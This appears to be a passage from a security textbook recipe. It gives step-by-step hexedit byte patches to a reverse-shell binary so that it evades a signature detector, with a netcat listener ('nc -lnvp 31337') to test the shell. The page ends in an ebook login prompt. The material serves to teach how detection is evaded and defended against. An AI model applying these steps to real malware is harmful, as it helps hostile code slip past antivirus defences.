How to do it...

To change the binary's signature, use the following steps.

  1. Run the following command in the Terminal session:
$ hexedit ch09-revshell64-modified
  1. Find the bytes 48 83 C0 3B at the end of 000000FC and use the arrow keys on the keyboard to move the cursor over the last byte, 3B.
The memory addresses in this recipe may be different on your system so keep that in mind.
  1. Change the last byte from 3B to 3C.
  2. Press the F2 key on the keyboard to save this change.
  3. Make sure the cursor is on 0F, which it should be after step 3.
  4. Press the Ctrl + spacebar keys on your keyboard to begin marking the hexadecimal.
  5. Use the down arrow key to highlight the rest of the hexadecimal in the file.
  6. Press Esc + W on your keyboard to copy the highlighted hexadecimal.
  7. Next, we need to inject the opcode for the dec rax instruction, which is 48 FF C8. This means we will overwrite the bytes 0F 05 00.
  8. With the cursor over 0F, type 48 FF C8 on your keyboard.
  9. Next, press F2 to save it.
  10. The cursor should now be on line 00000120 on the third byte, 00. Press Ctrl + Y to paste the copied bytes from step 8.
  11. Press F2 on the keyboard to save these changes.
  12. Now, we need to extend size attributes in two locations since we've added 3 bytes to the overall file. First, navigate the cursor to line 00000024 using the arrow keys on the keyboard.
  1. The fifth byte in that line should be 20. Change it to 23 and then press F2 to save your changes.
  2. Next, we need to lengthen the size of the .text section of the file. Navigate the cursor to line 00000264 and find the A1 byte located in the second to last column of bytes in that row.
  3. Using your keyboard, change A1 to A4, and then press F2 to save your changes.
  4. Press F10 on your keyboard to exit hexedit.
  5. Next, verify this worked by typing the following in the Terminal session:
$ objdump -d -M intel ch09-revshell64-modified
  1. Open another Terminal tab by pressing Ctrl + Shift + T on the keyboard.
  2. Start a netcat listener in the new Terminal tab by typing the following:
$ nc -lnvp 31337
  1. Return to the original Terminal tab and run the modified binary. Review the netcat Terminal tab to make sure it runs correctly:
$ ./ch09-revshell64-modified
  1. In the netcat Terminal tab, type the following:
$ exit
  1. Finally, back in the other Terminal tab, we test to see if our signature evasion worked. Run the following in the original Terminal session:
$ ./sigDetect.py ch09-revshell64-modified
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.119.125.7